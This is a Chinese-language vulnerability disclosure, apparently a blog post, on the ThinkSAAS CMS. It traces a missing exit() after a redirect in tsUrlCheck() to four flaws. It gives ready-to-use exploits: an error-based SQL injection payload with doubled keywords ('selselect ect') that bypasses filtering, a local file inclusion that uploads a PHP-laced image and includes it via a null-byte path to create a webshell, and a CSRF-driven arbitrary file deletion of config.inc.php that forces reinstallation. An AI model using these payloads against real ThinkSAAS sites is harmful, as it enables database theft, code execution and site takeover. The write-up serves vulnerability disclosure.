ThinkSAAS最新版漏洞打包

最新版中tsUrlCheck()函数引发了多个漏洞
\thinksaas\tsFunction.php

function tsUrlCheck($parameter) {

	$parameter = trim($parameter);
	//echo $parameter;exit();
	$arrStr = str_split($parameter);
	$strOk = '%-_1234567890abcdefghijklmnopqrstuvwxyz';
	foreach ($arrStr as $key => $item) {
		if (stripos($strOk, $item) === false) {
			//qiMsg('非法URL参数!');
			header('Location: /');
		}
	}
	return $parameter;
}

检查传入的参数存在非$strOk变量中的字符时,就是用header跳转。
但是没有使用exit()来退出,所以程序依然会继续往下执行。
那么问题来了!
1、第一处SQL注入:
\app\tag\action\add.php

case "do":
		$objname = tsFilter($_POST['objname']);
		$idname = tsFilter($_POST['idname']);
		$objid = intval($_POST['objid']);
		$tags = t($_POST['tags']);
		$new['tag']->addTag($objname,$idname,$objid,$tags);

$objname和$idname可控,而tsFilter()函数只进行了简单的过滤,可以被绕过。
使用selselect ect pwd frofrom m 即可
之后两个可控变量进入addTag()
\app\tag\class.tag.php

function addTag($objname,$idname,$objid,$tags){

	

		$objname = tsUrlCheck($objname);

		$idname = tsUrlCheck($idname);

		$objid = intval($objid);

	

		if($objname != '' && $idname != '' && $objid!=0 && $tags!=''){

			$tags = str_replace ( ',', ',', $tags );

			$arrTag = explode(',',$tags);

			foreach($arrTag as $item){

				$tagname = t($item);

				if(strlen($tagname) < '32' && $tagname != ''){

					$uptime = time();

					

					$tagcount = $this->findCount('tag',array(

						'tagname'=>$tagname,

					));

					

					if($tagcount == '0'){

						

						$tagid = $this->create('tag',array(

							'tagname'=>$tagname,

							'uptime'=>$uptime,

						));

						

						$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(

							$idname=>$objid,

							'tagid'=>$tagid,

						));

$objname和$idname进入$this->findCount()
$objname在表名处、$idname在作为$key,传入findCount()
跟进findCount()可以发现没有对$key进行过滤,并且没有被引号包裹,所以不受GPC限制。
因为此处有header会跳转,并且thinksaas报错不回显,所以需要有其他方式得到注入信息。

可以知道thinksaas所有的mysql报错信息都会被记录在一个日志文件中,所以使用报错注入就可以成功了。

exp:http://192.168.226.131/thinksaas/index.php?app=tag&ac=add&ts=do
POST:

objname=article&idname=1=1 anand d (selselect ect 1 frfrom om(selselect ect cocount unt(*),concat((selselect ect (selselect ect (selselect ect user())) frfrom om information_schema.tables limit 0,1),floor(rand(0)*2))x frfrom om information_schema.tables group bby y x)a)/*&objid=3&tags=5

demo
2、第二处SQL注入:
\app\tag\action\add_ajax.php

case "do":
		$objname = tsUrlCheck($_POST['objname']);
		$idname = tsUrlCheck($_POST['idname']);
		$objid = intval($_POST['objid']);
		$tags = t($_POST['tags']);
		$new['tag']->addTag($objname,$idname,$objid,$tags);

这里则直接用tsUrlCheck()检查POST数据的情况,连tsFilter()都没有使用。之后的分析与1相同

3、任意文件包含:
\thinksaas\thinksaas.php

$app = isset($_GET['app']) ? tsUrlCheck($_GET['app']) : 'home';
...
include 'app/' . $app . '/config.php';

GET的参数只因果tsUrlCheck检查就传入了include。
所以可以通过截断,直接包含任意文件。

首先在上传头像处上传一个插了php代码的图片
demo
接着访问,进行包含:
http://192.168.226.131/thinksaas/index.php?app=../cache/user/0/0/120/2.jpg%00a
在根目录下生成一个1.php
demo

4、任意文件删除:
/app/system/action/plugin.php

case "delete":
		$apps = tsUrlCheck($_GET['apps']);
		$pname = tsUrlCheck($_GET['pname']);
		delDir('plugins/'.$apps.'/'.$pname);

同样$apps和$pname只经过了tsUrlCheck的检测,就进入了危险函数。两个变量用户都可控,不需要截断,想怎么删就这么删。
不过由于该操作只能管理员操作,所以需要配合CSRF使用,以管理员身份,访问:
http://192.168.226.131/thinksaas/index.php?app=system&ac=plugin&ts=delete&apps=..&pname=data/config.inc.php
因为thinksaas通过判断是否存在config.inc.php,来判断是否进行过安装,所以删除该文件后,就可以进行再次安装。

发表评论